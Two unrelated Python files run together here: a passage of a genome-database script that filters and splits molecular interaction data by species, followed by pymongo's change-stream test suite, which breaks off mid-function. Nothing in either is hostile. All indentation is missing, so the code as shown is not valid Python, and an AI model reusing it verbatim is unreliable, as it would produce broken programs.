mgi_out = csv.writer(mgi_out, quotechar='', quoting=csv.QUOTE_NONE, delimiter='\t')
human_out = csv.writer(human_out, quotechar='', quoting=csv.QUOTE_NONE, delimiter='\t')
# This list is now sorted phylogenetically for the header to be sorted
out_write_list = [human_out, rgd_out, mgi_out, zfin_out, fb_out, wb_out, sgd_out, sarscov2_out]
taxon_file_dispatch_dict = {
'taxid:10116': rgd_out,
'taxid:9606': human_out,
'taxid:10090': mgi_out,
'taxid:6239': wb_out,
'taxid:559292': sgd_out,
'taxid:7955': zfin_out,
'taxid:7227': fb_out,
'taxid:2697049': sarscov2_out,
'taxid:4932': sgd_out,
'taxid:307796': sgd_out,
'taxid:643680': sgd_out,
'taxid:574961': sgd_out,
'taxid:285006': sgd_out,
'taxid:545124': sgd_out,
'taxid:764097': sgd_out
}
out_to_species_name_dict = {
rgd_out: 'Rattus norvegicus',
human_out: 'Homo sapiens',
mgi_out: 'Mus musculus',
wb_out: 'Caenorhabditis elegans',
sgd_out: 'Saccharomyces cerevisiae',
zfin_out: 'Danio rerio',
sarscov2_out: 'Severe acute respiratory syndrome coronavirus 2',
fb_out: 'Drosophila melanogaster'
}
out_to_header_taxonid_dict = {
rgd_out: 'NCBI:txid10116',
human_out: 'NCBI:txid9606',
mgi_out: 'NCBI:txid10090',
wb_out: 'NCBI:txid6239',
sgd_out: 'NCBI:txid559292',
zfin_out: 'NCBI:txid7955',
sarscov2_out: 'NCBI:txid2697049',
fb_out: 'NCBI:txid7227'
}
# Write the comments in the main file.
filetype = 'Molecular Interactions'
data_format = 'PSI-MI TAB 2.7 Format'
database_version = self.context_info.env["ALLIANCE_RELEASE"]
species_list = []
taxon_list = []
for entry in out_write_list:
taxon_list.append(out_to_header_taxonid_dict[entry])
species_list.append(out_to_species_name_dict[entry])
species = ", ".join(species_list)
taxon_ids = ", ".join(taxon_list)
taxon_ids = '# TaxonIDs: {}'.format(taxon_ids)
gen_time = datetime.utcnow().strftime("%Y-%m-%d %H:%M")
readme = 'https://github.com/HUPO-PSI/miTab/blob/master/PSI-MITAB27Format.md'
response = urllib.request.urlopen(self.context_info.env["HEADER_TEMPLATE_URL"])
header_template = HeaderTemplate(response.read().decode('ascii'))
header_dict = {'filetype': filetype, 'data_format': data_format, 'stringency_filter': '',
'taxon_ids': taxon_ids, 'database_version': database_version, 'species': species,
'gen_time': gen_time, 'readme': readme}
header = header_template.substitute(header_dict)
header_rows = [line.strip() for line in header.splitlines() if len(line.strip()) != 0]
for header_row in header_rows:
tsvout.writerow([header_row])
tsvout.writerow(psi_mi_tab_header)
for entry in out_write_list:
filetype = 'Molecular Interactions'
species = out_to_species_name_dict[entry]
taxon_ids = '# TaxonIDs: {}'.format(out_to_header_taxonid_dict[entry])
header_dict = {'filetype': filetype, 'data_format': data_format, 'stringency_filter': '',
'taxon_ids': taxon_ids, 'database_version': database_version, 'species': species,
'gen_time': gen_time, 'readme': readme}
header = header_template.substitute(header_dict)
header_rows = [line.strip() for line in header.splitlines() if len(line.strip()) != 0]
for header_row in header_rows:
entry.writerow([header_row])
entry.writerow(psi_mi_tab_header)
psi_mi_tab_header.insert(0,'Reason for skipping row.')
skipped_out.writerow(psi_mi_tab_header)
# The order of this list is important! Defined in the list above. Cannot be parallelized
for filename in parsing_list:
logger.info('Parsing file: %s' % (filename))
filename_type = None
if filename == imex_filename:
filename_type = 'imex'
elif filename == biogrid_filename:
filename_type = 'biogrid'
elif filename == flybase_filename:
filename_type = 'flybase'
elif filename == wormbase_filename:
filename_type = 'wormbase'
# Declare the tracking dict used to look for duplicates. It tracks sets.
publication_tracking_dict[filename_type] = set()
with open(filename, 'r', encoding='utf-8') as tsvin:
csv_reader = csv.reader(tsvin, delimiter='\t', quoting=csv.QUOTE_NONE)
# for local runs, to see progress
# for row in tqdm(csv_reader):
for row in csv_reader:
if row[0].startswith("#"):
row.insert(0,'Entry starts with # commented out or header')
skipped_out.writerow(row)
continue
if row[8] == '-':
row.insert(0,'Column 9 is blank, no publication')
skipped_out.writerow(row)
continue
if filename_type == 'biogrid':
if row[11] in rejected_col12:
row.insert(0,'col12 does not have an approved value: {}.'.format(row[11]))
skipped_out.writerow(row)
continue
if row[6] in rejected_col7:
row.insert(0,'col7 does not have an approved value: {}.'.format(row[6]))
skipped_out.writerow(row)
continue
biogrid_interaction_id = re.findall(r'\d+', row[13])[0]
if biogrid_interaction_id in self.biogrid_genetic_set:
row.insert(0,'biogrid_interaction_id genetic in tab 3.0: {}.'.format(biogrid_interaction_id))
skipped_out.writerow(row)
continue
# We need to add '-' characters to columns 17-42 for biogrid entries.
for _ in range(17,43):
row.append('-')
# Reassigning values in several columns as described above.
row[18] = 'psi-mi:\"MI:0496\"(bait)'
row[19] = 'psi-mi:\"MI:0498\"(prey)'
row[20] = 'psi-mi:\"MI:0326\"(protein)'
row[21] = 'psi-mi:\"MI:0326\"(protein)'
if biogrid_interaction_id in self.biogrid_rna_set:
row[21] = 'psi-mi:\"MI:0320\"(ribonucleic acid)'
row[35] = 'false'
try:
taxon_id_1 = re.search(r'taxid:\d+', row[9]).group(0)
except AttributeError:
row.insert(0,'Taxon ID appears to be missing for interactor A from row 10: %s' % row[9])
skipped_out.writerow(row)
continue # Skip rows where we don't find a taxon entry.
try:
taxon_id_2 = re.search(r'taxid:\d+', row[10]).group(0)
except AttributeError:
row.insert(0,'Taxon ID appears to be missing for interactor B from row 11: %s' % row[10])
skipped_out.writerow(row)
continue # Skip rows where we don't find a taxon entry.
if not taxon_id_1 in (taxon_species_set) or not taxon_id_2 in (taxon_species_set):
row.insert(0,'Not in Alliance taxon list.')
skipped_out.writerow(row)
continue # Skip rows where we don't have Alliance species or a blank entry.
if taxon_id_1 in possible_yeast_taxon_set: # Change yeast taxon ids to the preferred 'taxid:559292'
row[9] = 'taxid:559292(Saccharomyces cerevisiae)'
if taxon_id_2 in possible_yeast_taxon_set: # Change yeast taxon ids to the preferred 'taxid:559292'
row[10] = 'taxid:559292(Saccharomyces cerevisiae)'
row_initial = list(row) # Create a true copy of the list. Used for validation later.
# Skip rows with MI:0208 "genetic interaction".
if row[11].startswith(interaction_exclusion_set):
row.insert(0,'Contains a term from the interaction exclusion set.')
skipped_out.writerow(row)
continue
# Skip rows with undesired interaction types.
# Sometimes these columns don't exist in BIOGRID? IndexErrors still write the proper message and skip the entry.
if filename_type != 'biogrid': # Biogrid stops at row 16.
try:
if row[20].startswith(interactor_type_exclusion_set):
row.insert(0,'Contains a term from the interactor type exclusion set.')
skipped_out.writerow(row)
continue
except IndexError:
row.insert(0,'Interactor type column not found? Skipping entry.')
skipped_out.writerow(row)
continue
try:
if row[21].startswith(interactor_type_exclusion_set):
row.insert(0,'Contains a term from the interactor type exclusion set.')
skipped_out.writerow(row)
continue
except IndexError:
row.insert(0,'Interactor type column not found? Skipping entry.')
skipped_out.writerow(row)
continue
# Skip entries which have 'Expansion method(s)'.
if row[15] is not '-':
row.insert(0,'Contains an expansion method.')
skipped_out.writerow(row)
continue
interactor_A_resolved, interactor_B_resolved, row = self.resolve_identifiers_by_row(row, mapped_out)
if interactor_A_resolved is False and interactor_B_resolved is True:
row.insert(0,'Can\'t resolve interactor A identifier, alias, alternate id, or xref against the list of known Alliance identifiers.')
skipped_out.writerow(row)
continue
elif interactor_A_resolved is True and interactor_B_resolved is False:
row.insert(0,'Can\'t resolve interactor B identifier, alias, alternate id, or xref against the list of known Alliance identifiers.')
skipped_out.writerow(row)
continue
elif interactor_A_resolved is False and interactor_B_resolved is False:
row.insert(0,'Can\'t resolve either interactor A or B identifier, alias, alternate id, or xref against the list of known Alliance identifiers.')
skipped_out.writerow(row)
continue
# Grab the publication information
# Also creating a tuple "key" to use for filtering purposes.
if row[8] is not None:
pubmed_unassigned = re.search(r'pubmed:unassigned', row[8])
if pubmed_unassigned is not None:
row.insert(0,'Pubmed value is unassigned')
skipped_out.writerow(row)
continue
publication_re = re.search(r'pubmed:\d+', row[8])
if publication_re is not None:
publication = publication_re.group(0)
if publication.startswith('pubmed:88880000'):
biogrid_key = row[13]
if biogrid_key in self.biogrid_doi_dict:
publication = self.biogrid_doi_dict[biogrid_key]
row[8] = self.biogrid_doi_dict[biogrid_key]
else:
row.insert(0,'Column 9 has pubmed:88880000 but biogrid_key %s does not have valid mapping in biogrid-tab3 file' % (biogrid_key))
skipped_out.writerow(row)
continue
# Capture everything up to the first parenthesis in the taxon column.
taxon1 = re.search(r'taxid:\d+', row[9]).group(0)
taxon2 = re.search(r'taxid:\d+', row[10]).group(0)
# Build a filtering key from the publication, taxon1, and taxon2.
tracking_tuple = (publication, taxon1, taxon2)
exit_tsv_loop = False
for key, value in publication_tracking_dict.items():
if key != filename_type: # Don't look in our current dictionary.
if tracking_tuple in value:
row.insert(0,'Already added this interaction to the export file from %s. Filter criteria: %s' % (key, (tracking_tuple,)))
skipped_out.writerow(row)
exit_tsv_loop = True
if exit_tsv_loop == True:
continue
# If we loop through all the possible sets and don't continue, add the tuple.
publication_tracking_dict[filename_type].add(tracking_tuple)
if filename_type != 'biogrid' and len(row) != len(row_initial):
print('FATAL ERROR: The row length was changed during processing.')
print(row_initial)
print(row)
quit()
# Write the row to all the appropriate files.
tsvout.writerow(row)
taxon1 = re.search(r'taxid:\d+', row[9]).group(0)
taxon2 = re.search(r'taxid:\d+', row[10]).group(0)
self.wrote_to_file_already = False
if taxon1 == taxon2:
try:
taxon_file_dispatch_dict[taxon1].writerow(row)
except KeyError:
pass
else:
try:
taxon_file_dispatch_dict[taxon1].writerow(row)
except KeyError:
pass
try:
taxon_file_dispatch_dict[taxon2].writerow(row)
except KeyError:
pass
def validate_and_upload_files_to_fms(self):
logger.info('Summary of files created:')
logger.info(os.system("ls -alh {}*".format(self.output_dir)))
upload_location_dict = {
'alliance_molecular_interactions.tsv': 'COMBINED',
'alliance_molecular_interactions_fly.tsv': 'FB',
'alliance_molecular_interactions_sarscov2.tsv': 'SARS-CoV-2',
'alliance_molecular_interactions_worm.tsv': 'WB',
'alliance_molecular_interactions_zebrafish.tsv': 'ZFIN',
'alliance_molecular_interactions_yeast.tsv': 'SGD',
'alliance_molecular_interactions_rat.tsv': 'RGD',
'alliance_molecular_interactions_mouse.tsv': 'MGI',
'alliance_molecular_interactions_human.tsv': 'HUMAN'
}
thread_pool = []
for filename in upload_location_dict.keys():
dataSubType = upload_location_dict[filename]
p = multiprocessing.Process(target=super().fms_upload, args=("INTERACTION-MOL", dataSubType, filename))
p.start()
thread_pool.append(p)
Processor.wait_for_threads(thread_pool)
|
test_change_stream.py
|
# Copyright 2017 MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test the change_stream module."""
import random
import os
import re
import sys
import string
import threading
import time
import uuid
from contextlib import contextmanager
from itertools import product
sys.path[0:0] = ['']
from bson import BSON, ObjectId, SON, json_util
from bson.binary import (ALL_UUID_REPRESENTATIONS,
Binary,
STANDARD,
PYTHON_LEGACY)
from bson.py3compat import iteritems
from bson.raw_bson import DEFAULT_RAW_BSON_OPTIONS, RawBSONDocument
from pymongo.change_stream import _NON_RESUMABLE_GETMORE_ERRORS
from pymongo.command_cursor import CommandCursor
from pymongo.errors import (InvalidOperation, OperationFailure,
ServerSelectionTimeoutError)
from pymongo.message import _CursorAddress
from pymongo.read_concern import ReadConcern
from pymongo.write_concern import WriteConcern
from test import client_context, unittest, IntegrationTest
from test.utils import (
EventListener, WhiteListEventListener, rs_or_single_client
)
class ChangeStreamTryNextMixin(object):
def change_stream_with_client(self, client, *args, **kwargs):
raise NotImplementedError
def change_stream(self, *args, **kwargs):
return self.change_stream_with_client(self.client, *args, **kwargs)
def watched_collection(self):
"""Return a collection that is watched by self.change_stream()."""
raise NotImplementedError
def kill_change_stream_cursor(self, change_stream):
# Cause a cursor not found error on the next getMore.
cursor = change_stream._cursor
address = _CursorAddress(cursor.address, cursor._CommandCursor__ns)
client = self.watched_collection().database.client
client._close_cursor_now(cursor.cursor_id, address)
def test_try_next(self):
# ChangeStreams only read majority committed data so use w:majority.
coll = self.watched_collection().with_options(
write_concern=WriteConcern("majority"))
coll.drop()
coll.insert_one({})
self.addCleanup(coll.drop)
with self.change_stream(max_await_time_ms=250) as stream:
self.assertIsNone(stream.try_next())
self.assertIsNone(stream._resume_token)
coll.insert_one({})
change = stream.try_next()
self.assertEqual(change['_id'], stream._resume_token)
self.assertIsNone(stream.try_next())
self.assertEqual(change['_id'], stream._resume_token)
def test_try_next_runs_one_getmore(self):
listener = EventListener()
client = rs_or_single_client(event_listeners=[listener])
# Connect to the cluster.
client.admin.command('ping')
listener.results.clear()
# ChangeStreams only read majority committed data so use w:majority.
coll = self.watched_collection().with_options(
write_concern=WriteConcern("majority"))
coll.drop()
# Create the watched collection before starting the change stream to
# skip any "create" events.
coll.insert_one({'_id': 1})
self.addCleanup(coll.drop)
with self.change_stream_with_client(
client, max_await_time_ms=250) as stream:
self.assertEqual(listener.started_command_names(), ["aggregate"])
listener.results.clear()
# Confirm that only a single getMore is run even when no documents
# are returned.
self.assertIsNone(stream.try_next())
self.assertEqual(listener.started_command_names(), ["getMore"])
listener.results.clear()
self.assertIsNone(stream.try_next())
self.assertEqual(listener.started_command_names(), ["getMore"])
listener.results.clear()
# Get at least one change before resuming.
coll.insert_one({'_id': 2})
change = stream.try_next()
self.assertEqual(change['_id'], stream._resume_token)
listener.results.clear()
# Cause the next request to initiate the resume process.
self.kill_change_stream_cursor(stream)
listener.results.clear()
# The sequence should be:
# - getMore, fail
# - resume with aggregate command
# - no results, return immediately without another getMore
self.assertIsNone(stream.try_next())
self.assertEqual(
listener.started_command_names(), ["getMore", "aggregate"])
listener.results.clear()
# Stream still works after a resume.
coll.insert_one({'_id': 3})
change = stream.try_next()
self.assertEqual(change['_id'], stream._resume_token)
self.assertEqual(listener.started_command_names(), ["getMore"])
self.assertIsNone(stream.try_next())
class TestClusterChangeStream(IntegrationTest, ChangeStreamTryNextMixin):
@classmethod
@client_context.require_version_min(4, 0, 0, -1)
@client_context.require_no_mmap
@client_context.require_no_standalone
def setUpClass(cls):
super(TestClusterChangeStream, cls).setUpClass()
cls.dbs = [cls.db, cls.client.pymongo_test_2]
@classmethod
def tearDownClass(cls):
for db in cls.dbs:
cls.client.drop_database(db)
super(TestClusterChangeStream, cls).tearDownClass()
def change_stream_with_client(self, client, *args, **kwargs):
return client.watch(*args, **kwargs)
def watched_collection(self):
return self.db.test
def generate_unique_collnames(self, numcolls):
# Generate N collection names unique to a test.
collnames = []
for idx in range(1, numcolls + 1):
collnames.append(self.id() + '_' + str(idx))
return collnames
def insert_and_check(self, change_stream, db, collname, doc):
coll = db[collname]
coll.insert_one(doc)
change = next(change_stream)
self.assertEqual(change['operationType'], 'insert')
self.assertEqual(change['ns'], {'db': db.name,
'coll': collname})
self.assertEqual(change['fullDocument'], doc)
def test_simple(self):
collnames = self.generate_unique_collnames(3)
with self.change_stream() as change_stream:
for db, collname in product(self.dbs, collnames):
self.insert_and_check(
change_stream, db, collname, {'_id': collname}
)
class TestDatabaseChangeStream(IntegrationTest, ChangeStreamTryNextMixin):
@classmethod
@client_context.require_version_min(4, 0, 0, -1)
@client_context.require_no_mmap
@client_context.require_no_standalone
def setUpClass(cls):
super(TestDatabaseChangeStream, cls).setUpClass()
def change_stream_with_client(self, client, *args, **kwargs):
return client[self.db.name].watch(*args, **kwargs)
def watched_collection(self):
return self.db.test
def generate_unique_collnames(self, numcolls):
# Generate N collection names unique to a test.
collnames = []
for idx in range(1, numcolls + 1):
collnames.append(self.id() + '_' + str(idx))
return collnames
def insert_and_check(self, change_stream, collname, doc):
coll = self.db[collname]
coll.insert_one(doc)
change = next(change_stream)
self.assertEqual(change['operationType'], 'insert')
self.assertEqual(change['ns'], {'db': self.db.name,
'coll': collname})
self.assertEqual(change['fullDocument'], doc)
def test_simple(self):
collnames = self.generate_unique_collnames(3)
with self.change_stream() as change_stream:
for collname in collnames:
self.insert_and_check(
change_stream, collname, {'_id': uuid.uuid4()}
)
def test_isolation(self):
# Ensure inserts to other dbs don't show up in our ChangeStream.
other_db = self.client.pymongo_test_temp
self.assertNotEqual(
other_db, self.db, msg="Isolation must be tested on separate DBs"
)
collname = self.id()
with self.change_stream() as change_stream:
other_db[collname].insert_one({'_id': uuid.uuid4()})
self.insert_and_check(
change_stream, collname, {'_id': uuid.uuid4()}
)
self.client.drop_database(other_db)
class TestCollectionChangeStream(IntegrationTest, ChangeStreamTryNextMixin):
@classmethod
@client_context.require_version_min(3, 5, 11)
@client_context.require_no_mmap
@client_context.require_no_standalone
def setUpClass(cls):
super(TestCollectionChangeStream, cls).setUpClass()
cls.coll = cls.db.change_stream_test
# SERVER-31885 On a mongos the database must exist in order to create
# a changeStream cursor. However, WiredTiger drops the database when
# there are no more collections. Let's prevent that.
cls.db.prevent_implicit_database_deletion.insert_one({})
@classmethod
def tearDownClass(cls):
cls.db.prevent_implicit_database_deletion.drop()
super(TestCollectionChangeStream, cls).tearDownClass()
def setUp(self):
# Use a new collection for each test.
self.coll = self.db[self.id()]
def tearDown(self):
self.coll.drop()
def change_stream_with_client(self, client, *args, **kwargs):
return client[self.db.name].test.watch(*args, **kwargs)
def watched_collection(self):
return self.db.test
def insert_and_check(self, change_stream, doc):
self.coll.insert_one(doc)
change = next(change_stream)
self.assertEqual(change['operationType'], 'insert')
self.assertEqual(change['ns'], {'db': self.coll.database.name,
'coll': self.coll.name})
self.assertEqual(change['fullDocument'], doc)
def test_watch(self):
with self.coll.watch(
[{'$project': {'foo': 0}}], full_document='updateLookup',
max_await_time_ms=1000, batch_size=100) as change_stream:
self.assertEqual([{'$project': {'foo': 0}}],
change_stream._pipeline)
self.assertEqual('updateLookup', change_stream._full_document)
self.assertIsNone(change_stream._resume_token)
self.assertEqual(1000, change_stream._max_await_time_ms)
self.assertEqual(100, change_stream._batch_size)
self.assertIsInstance(change_stream._cursor, CommandCursor)
self.assertEqual(
1000, change_stream._cursor._CommandCursor__max_await_time_ms)
self.coll.insert_one({})
change = change_stream.next()
resume_token = change['_id']
with self.assertRaises(TypeError):
self.coll.watch(pipeline={})
with self.assertRaises(TypeError):
self.coll.watch(full_document={})
# No Error.
with self.coll.watch(resume_after=resume_token):
pass
def test_full_pipeline(self):
"""$changeStream must be the first stage in a change stream pipeline
sent to the server.
"""
listener = WhiteListEventListener("aggregate")
results = listener.results
client = rs_or_single_client(event_listeners=[listener])
self.addCleanup(client.close)
coll = client[self.db.name][self.coll.name]
with coll.watch([{'$project': {'foo': 0}}]) as _:
pass
self.assertEqual(1, len(results['started']))
command = results['started'][0]
self.assertEqual('aggregate', command.command_name)
self.assertEqual([
{'$changeStream': {'fullDocument': 'default'}},
{'$project': {'foo': 0}}],
command.command['pipeline'])
def test_iteration(self):
with self.coll.watch(batch_size=2) as change_stream:
num_inserted = 10
self.coll.insert_many([{} for _ in range(num_inserted)])
self.coll.drop()
inserts_received = 0
for change in change_stream:
if change['operationType'] not in ('drop', 'invalidate'):
self.assertEqual(change['operationType'], 'insert')
inserts_received += 1
self.assertEqual(num_inserted, inserts_received)
# Last change should be invalidate.
self.assertEqual(change['operationType'], 'invalidate')
with self.assertRaises(StopIteration):
change_stream.next()
with self.assertRaises(StopIteration):
next(change_stream)
def _test_next_blocks(self, change_stream):
inserted_doc = {'_id': ObjectId()}
changes = []
t = threading.Thread(
target=lambda: changes.append(change_stream.next()))
t.start()
# Sleep for a bit to prove that the call to next() blocks.
time.sleep(1)
self.assertTrue(t.is_alive())
self.assertFalse(changes)
self.coll.insert_one(inserted_doc)
# Join with large timeout to give the server time to return the change,
# in particular for shard clusters.
t.join(30)
self.assertFalse(t.is_alive())
self.assertEqual(1, len(changes))
self.assertEqual(changes[0]['operationType'], 'insert')
self.assertEqual(changes[0]['fullDocument'], inserted_doc)
def test_next_blocks(self):
"""Test that next blocks until a change is readable"""
# Use a short await time to speed up the test.
with self.coll.watch(max_await_time_ms=250) as change_stream:
self._test_next_blocks(change_stream)
def test_aggregate_cursor_blocks(self):
"""Test that an aggregate cursor blocks until a change is readable."""
with self.coll.aggregate([{'$changeStream': {}}],
maxAwaitTimeMS=250) as change_stream:
self._test_next_blocks(change_stream)
def test_concurrent_close(self):
"""Ensure a ChangeStream can be closed from another thread."""
# Use a short await time to speed up the test.
with self.coll.watch(max_await_time_ms=250) as change_stream:
def iterate_cursor():
for _ in change_stream:
pass
t = threading.Thread(target=iterate_cursor)
t.start()
self.coll.insert_one({})
time.sleep(1)
change_stream.close()
t.join(3)
self.assertFalse(t.is_alive())
def test_update_resume_token(self):
"""ChangeStream must continuously track the last seen resumeToken."""
with self.coll.watch() as change_stream:
self.assertIsNone(change_stream._resume_token)
for _ in range(3):
self.coll.insert_one({})
change = next(change_stream)
self.assertEqual(change['_id'], change_stream._resume_token)
@client_context.require_no_mongos # PYTHON-1739
def test_raises_error_on_missing_id(self):
"""ChangeStream will raise an exception if the server response is
missing the resume token.
"""
with self.coll.watch([{'$project': {'_id': 0}}]) as change_stream:
self.coll.insert_one({})
# Server returns an error after SERVER-37786, otherwise pymongo
# raises an error.
with self.assertRaises((InvalidOperation, OperationFailure)):
next(change_stream)
# The cursor should now be closed.
with self.assertRaises(StopIteration):
next(change_stream)
def test_resume_on_error(self):
"""ChangeStream will automatically resume one time on a resumable
error (including not master) with the initial pipeline and options,
except for the addition/update of a resumeToken.
"""
with self.coll.watch([]) as change_stream:
self.insert_and_check(change_stream, {'_id': 1})
# Cause a cursor not found error on the next getMore.
self.kill_change_stream_cursor(change_stream)
self.insert_and_check(change_stream, {'_id': 2})
def test_does_not_resume_fatal_errors(self):
"""ChangeStream will not attempt to resume fatal server errors."""
for code in _NON_RESUMABLE_GETMORE_ERRORS:
with self.coll.watch() as change_stream:
self.coll.insert_one({})
def mock_try_next(*args, **kwargs):
change_stream._cursor.close()
raise OperationFailure('Mock server error', code=code)
original_try_next = change_stream._cursor._try_next
change_stream._cursor._try_next = mock_try_next
with self.assertRaises(OperationFailure):
next(change_stream)
change_stream._cursor._try_next = original_try_next
with self.assertRaises(StopIteration):
next(change_stream)
def test_initial_empty_batch(self):
"""Ensure that a cursor returned from an aggregate command with a
cursor id, and an initial empty batch, is not closed on the driver
side.
"""
with self.coll.watch() as change_stream:
# The first batch should be empty.
self.assertEqual(
0, len(change_stream._cursor._CommandCursor__data))
cursor_id = change_stream._cursor.cursor_id
self.assertTrue(cursor_id)
self.insert_and_check(change_stream, {})
# Make sure we're still using the same cursor.
self.assertEqual(cursor_id, change_stream._cursor.cursor_id)
def test_kill_cursors(self):
"""The killCursors command sent during the resume process must not be
allowed to raise an exception.
"""
def raise_error():
raise ServerSelectionTimeoutError('mock error')
with self.coll.watch([]) as change_stream:
self.insert_and_check(change_stream, {'_id': 1})
# Cause a cursor not found error on the next getMore.
cursor = change_stream._cursor
self.kill_change_stream_cursor(change_stream)
cursor.close = raise_error
self.insert_and_check(change_stream, {'_id': 2})
def test_unknown_full_document(self):
"""Must rely on the server to raise an error on unknown fullDocument.
"""
try:
with self.coll.watch(full_document='notValidatedByPyMongo'):
pass
except OperationFailure:
pass
def test_change_operations(self):
"""Test each operation type."""
expected_ns = {'db': self.coll.database.name, 'coll': self.coll.name}
with self.coll.watch() as change_stream:
# Insert.
inserted_doc = {'_id': ObjectId(), 'foo': 'bar'}
self.coll.insert_one(inserted_doc)
change = change_stream.next()
self.assertTrue(change['_id'])
self.assertEqual(change['operationType'], 'insert')
self.assertEqual(change['ns'], expected_ns)
self.assertEqual(change['fullDocument'], inserted_doc)
# Update.
update_spec = {'$set': {'new': 1}, '$unset': {'foo': 1}}
self.coll.update_one(inserted_doc, update_spec)
change = change_stream.next()
self.assertTrue(change['_id'])
self.assertEqual(change['operationType'], 'update')
self.assertEqual(change['ns'], expected_ns)
self.assertNotIn('fullDocument', change)
self.assertEqual({'updatedFields': {'new': 1},
'removedFields': ['foo']},
change['updateDescription'])
# Replace.
self.coll.replace_one({'new': 1}, {'foo': 'bar'})
change = change_stream.next()
self.assertTrue(change['_id'])
self.assertEqual(change['operationType'], 'replace')
self.assertEqual(change['ns'], expected_ns)
self.assertEqual(change['fullDocument'], inserted_doc)
# Delete.
self.coll.delete_one({'foo': 'bar'})
change = change_stream.next()
self.assertTrue(change['_id'])
self.assertEqual(change['operationType'], 'delete')
self.assertEqual(change['ns'], expected_ns)
self.assertNotIn('fullDocument', change)
# Invalidate.
self.coll.drop()
change = change_stream.next()
# 4.1 returns a "drop" change document.
if change['operationType'] == 'drop':
self.assertTrue(change['_id'])
self.assertEqual(change['ns'], expected_ns)
# Last change should be invalidate.
change = change_stream.next()
self.assertTrue(change['_id'])
self.assertEqual(change['operationType'], 'invalidate')
self.assertNotIn('ns', change)
self.assertNotIn('fullDocument', change)
# The ChangeStream should be dead.
with self.assertRaises(StopIteration):
change_stream.next()
def test_raw(self):
"""Test with RawBSONDocument."""
raw_coll = self.coll.with_options(
codec_options=DEFAULT_RAW_BSON_OPTIONS)
with raw_coll.watch() as change_stream:
raw_doc = RawBSONDocument(BSON.encode({'_id': 1}))
self.coll.insert_one(raw_doc)
change = next(change_stream)
self.assertIsInstance(change, RawBSONDocument)
self.assertEqual(change['operationType'], 'insert')
self.assertEqual(change['ns']['db'], self.coll.database.name)
self.assertEqual(change['ns']['coll'], self.coll.name)
self.assertEqual(change['fullDocument'], raw_doc)
self.assertEqual(change['_id'], change_stream._resume_token)
def test_uuid_representations(self):
"""Test with uuid document _ids and different uuid_representation."""
for uuid_representation in ALL_UUID_REPRESENTATIONS:
for id_subtype in (STANDARD, PYTHON_LEGACY):
resume_token = None
options = self.coll.codec_options.with_options(
uuid_representation=uuid_representation)
coll = self.coll.with_options(codec_options=options)
with coll.watch() as change_stream:
coll.insert_one(
{'_id': Binary(uuid.uuid4().bytes, id_subtype)})
resume_token = change_stream.next()['_id']
# Should not error.
coll.watch(resume_after=resume_token)
def test_document_id_order(self):
"""Test with document _ids that need their order preserved."""
random_keys = random.sample(string.ascii_letters,
len(string.ascii_letters))
random_doc = {'_id': SON([(key, key) for key in random_keys])}
for document_class in (dict, SON, RawBSONDocument):
options = self.coll.codec_options.with_options(
document_class=document_class)
coll = self.coll.with_options(codec_options=options)
with coll.watch() as change_stream:
coll.insert_one(random_doc)
resume_token = change_stream.next()['_id']
# The resume token is always a document.
self.assertIsInstance(resume_token, document_class)
# Should not error.
coll.watch(resume_after=resume_token)
coll.delete_many({})
def test_read_concern(self):
"""Test readConcern is not validated by the driver."""
# Read concern 'local' is not allowed for $changeStream.
coll = self.coll.with_options(read_concern=ReadConcern('local'))
with self.assertRaises(OperationFailure):
coll.watch()
# Does not error.
coll = self.coll.with_options(read_concern=ReadConcern('majority'))
with coll.watch():
pass
def invalidate_resume_token(self):
with self.coll.watch(
[{'$match': {'operationType': 'invalidate'}}]) as cs:
self.coll.insert_one({'_id': 1})
self.coll.drop()
resume_token = cs.next()['_id']
self.assertFalse(cs.alive)
return resume_token
@client_context.require_version_min(4, 1, 1)
def test_start_after(self):
resume_token = self.invalidate_resume_token()
# resume_after cannot resume after invalidate.
with self.assertRaises(OperationFailure):
self.coll.watch(resume_after=resume_token)
# start_after can resume after invalidate.
with self.coll.watch(start_after=resume_token) as change_stream:
self.coll.insert_one({'_id': 2})
change = change_stream.next()
self.assertEqual(change['operationType'], 'insert')
self.assertEqual(change['fullDocument'], {'_id': 2})
@client_context.require_version_min(4, 1, 1)
def test_start_after_resume_process_with_changes(self):
resume_token = self.invalidate_resume_token()
with self.coll.watch(start_after=resume_token,
max_await_time_ms=250) as change_stream:
self.coll.insert_one({'_id': 2})
change = change_stream.next()
self.assertEqual(change['operationType'], 'insert')
self.assertEqual(change['fullDocument'], {'_id': 2})
self.assertIsNone(change_stream.try_next())
self.kill_change_stream_cursor(change_stream)
self.coll.insert_one({'_id': 3})
change = change_stream.next()
self.assertEqual(change['operationType'], 'insert')
self.assertEqual(change['fullDocument'], {'_id': 3})
@client_context.require_no_mongos # Remove after SERVER-41196
@client_context.require_version_min(4, 1, 1)
def test_start_after_resume_process_without_changes(self):
resume_token = self.invalidate_resume_token()
with self.coll.watch(start_after=resume_token,
max_await_time_ms=250) as change_stream:
self.assertIsNone(change_stream.try_next())
self.kill_change_stream_cursor(change_stream)
self.coll.insert_one({'_id': 2})
change = change_stream.next()
self.assertEqual(change['operationType'], 'insert')
self.assertEqual(change['fullDocument'], {'_id': 2})
class TestAllScenarios(unittest.TestCase):
@classmethod
@client_context.require_connection
def setUpClass(cls):
cls.listener = WhiteListEventListener("aggregate")
cls.client = rs_or_single_client(event_listeners=[cls.listener])
@classmethod
def tearDownClass(cls):
cls.client
def setUp(self):
self.listener.results.clear()
def setUpCluster(self, scenario_dict):
assets = [
(scenario_dict["database_name"], scenario_dict["collection_name"]),
(scenario_dict["database2_name"], scenario_dict["collection2_name"]),
]
for db, coll in assets:
self.client.drop_database(db)
self.client[db].create_collection(coll)
def tearDown(self):
self.listener.results.clear()
_TEST_PATH = os.path.join(
os.path.dirname(os.path.realpath(__file__)), 'change_streams'
)
def camel_to_snake(camel):
# Regex to convert CamelCase to snake_case.
snake = re.sub('(.)([A-Z][a-z]+)', r'\1_\2', camel)
return re.sub('([a-z0-9])([A-Z])', r'\1_\2', snake).lower()
def get_change_stream(client, scenario_def, test):
# Get target namespace on which to instantiate change stream
target = test["target"]
if target == "collection":
db = client.get_database(scenario_def["database_name"])
